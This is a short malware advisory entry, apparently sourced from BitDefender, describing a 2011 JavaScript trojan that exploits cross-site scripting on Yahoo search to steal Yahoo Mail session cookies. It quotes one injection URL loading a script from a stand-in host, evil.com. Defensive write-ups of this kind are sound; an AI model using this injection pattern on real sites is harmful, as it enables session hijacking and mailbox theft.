Home / malware Trojan.JS.CookieMonster.A
First posted on 21 November 2011.
Source: BitDefenderAliases :
There are no other names known for Trojan.JS.CookieMonster.A.
Explanation :
If the user clicks that link from webmail he will be redirected to a page which is exploited using a "cross site scripting" or a "html injection" vulnerability that had the effect of executing the contained javascript in the security context of Yahoo, javascript which steal the user cookies used for yahoo mail.
The vulnerability affects the yahoo search engine so that browsers visiting the malicious page try to open:
http://search.yahoo.com/bin/search?p=[...http://evil.com/script.js...]
The script.js is executed and this script calls document.cookie to get user cookies and to save them.
Those cookies help that spammer to hijack that yahoo session and get into user mail account where he can harvest the contacts from user address book and make more spam or he can read user mails even the user has signed out.Last update 21 November 2011
